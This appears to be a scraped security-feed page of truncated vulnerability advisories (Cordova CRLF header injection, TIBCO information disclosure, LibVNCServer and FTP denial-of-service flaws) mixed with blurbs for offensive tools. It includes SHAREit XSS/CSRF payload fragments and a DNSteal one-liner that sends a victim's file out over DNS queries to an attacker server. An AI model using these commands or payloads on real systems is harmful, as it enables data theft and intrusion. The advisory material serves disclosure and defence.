CVE-2015-5204

CRLF injection vulnerability in the Apache Cordova File Transfer Plugin cordova-plugin-file-transfer for Android before 1.3.0 allows remote attackers to inject arbitrary headers via CRLF sequences in the filename of an uploaded file...

CVE-2015-5204

CVE-2015-5204 affects the cordova-plugin-file-transfer for Android (versions 1.2.1 and earlier). The root cause is HTTP header injection via improper validation of the Filename argument, allowing an attacker to inject CRLF sequences and thus manipulate headers in the HTTP response. Documented imp...

SHAREit WebShare 2.3.80 Cross Site Scripting

http://192.168.1.5/list?path=alert/Mahdi.Hidden/...

Cisco Web Security Appliance Denial of Service Vulnerability (CNVD-2015-07874)

The Cisco Web Security Appliance is a secure Web gateway that integrates malware protection, application visualization control, policy control, and more in one platform. A security vulnerability exists in the Cisco Web Security Appliance WSA appliance software versions 8.0.7-142 and 8.5.1-021,...

SUSE SLED11 / SLES11 Security Update : LibVNCServer (SUSE-SU-2015:2110-1)

The libvncserver package was updated to fix the following security issues : - bsc897031: fix several security issues : - CVE-2014-6051: Integer overflow in MallocFrameBuffer on client side. - CVE-2014-6052: Lack of malloc return value checking on client side. - CVE-2014-6053: Server crash on a ve...

SHAREit WebShare 2.3.80 Cross Site Request Forgery

Ex. http://192.168.1.2 Ex. /folder/image.jpg setTimeoutcsrf.submit,1; Ex. http://192.168.1.2 Ex. /folder/ setTimeoutcsrf.submit,1;...

Apache cordova-plugin-file-transfer HTTP header injection vulnerability

Apache Cordova is the Apache Software Foundation's platform for developing mobile applications using HTML, CSS, and JavaScript, and is the core engine that drives PhoneGap the development framework. Apache cordova-plugin-file-transfer is a file transfer plugin. a file-transfer plugin. An HTTP...

Powercat - Netcat: The Powershell Version

Installation powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts. Load The Function From Downloaded .ps1 File: . .\powercat.p...

Re: CVE-2015-5204: HTTP header injection vulnerability in Apache Cordova File Transfer Plugin for Android

CVE-2015-5204: HTTP header injection vulnerability in Apache Cordova File Transfer Plugin for Android Severity: Medium Vendor: The Apache Software Foundation Versions Affected: Cordova Android File Transfer Plugin 1.2.1 and below Description: Android applications built with the Cordova framework...

The vulnerability of the microprogramming software of Schneider Electric’s Modicon M340 programmable logic controller allows a remote intruder to trigger a service failure.

The vulnerability of the microprogrammed software of Schneider Electric’s Modicon M340 programmable logic controller is caused by buffer overflow. Exploiting this vulnerability could allow a malicious actor to trigger a service failure through a specially crafted FTP traffic...

Konica Minolta FTP Utility Denial of Service Vulnerability

KONICA MINOLTA FTP Utility is a software used by KONICA MINOLTA copiers. Konica Minolta FTP Utility 1.0 is implemented with a buffer overflow vulnerability. A remote attacker could cause a denial of service application crash by exploiting this vulnerability via a longer USER command...

TIBCO Slingshot Information Disclosure Vulnerability

TIBCO Managed File Transfer is an enterprise-class peer-to-peer file transfer solution. A security vulnerability exists in the TIBCO Managed File Transfer engine that could be exploited by remote attackers to submit a special HTTP request to obtain sensitive information...

Apple OS X tnftpd Denial of Service Vulnerability

Apple OS X is an operating system developed by Apple Inc. A glob handling vulnerability in Apple OS X tnftpd allows attackers to conduct denial of service attacks against FTP servers by exploiting the vulnerability...

CVE-2015-5711

TIBCO Managed File Transfer Internet Server before 7.2.5, Managed File Transfer Command Center before 7.2.5, Slingshot before 1.9.4, and Vault before 2.0.1 allow remote authenticated users to obtain sensitive information via a crafted HTTP request...

CVE-2015-5711

TIBCO Managed File Transfer Internet Server before 7.2.5, Managed File Transfer Command Center before 7.2.5, Slingshot before 1.9.4, and Vault before 2.0.1 allow remote authenticated users to obtain sensitive information via a crafted HTTP request...

CVE-2015-5711

The CVE-2015-5711 entry affects TIBCO products: Managed File Transfer Internet Server (before 7.2.5), Managed File Transfer Command Center (before 7.2.5), Slingshot (before 1.9.4), and Vault (before 2.0.1). The root cause is an information disclosure vulnerability that allows remote authenticated...

Apache Cordova plugin cordova-plugin-file-transfer vulnerable to HTTP header injection

Overview cordova-plugin-file-transfer, a plugin for Apache Cordova provided by the Apache Software Foundation, provides functionality to upload and download files in applications created by Apache Cordova. It also provides functionality to add HTTP headers. Android applications that use...

JVN#21612597: Apache Cordova plugin cordova-plugin-file-transfer vulnerable to HTTP header injection

cordova-plugin-file-transfer, a plugin for Apache Cordova provided by the Apache Software Foundation, provides functionality to upload and download files in applications created by Apache Cordova. It also provides functionality to add HTTP headers. Android applications that use...

DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. Below is an image showing an example of how to use: On the victim machine, you simply can do something like so: for b in $xxd -p file/to/send.png; do dig @server $b.filename.com; done...

PEInjector - MITM PE file infector

The executable file format on the Windows platform is PE COFF. The peinjector provides different ways to infect these files with custom payloads without changing the original functionality. It creates patches, which are then applied seamlessly during file transfer. It is very performant,...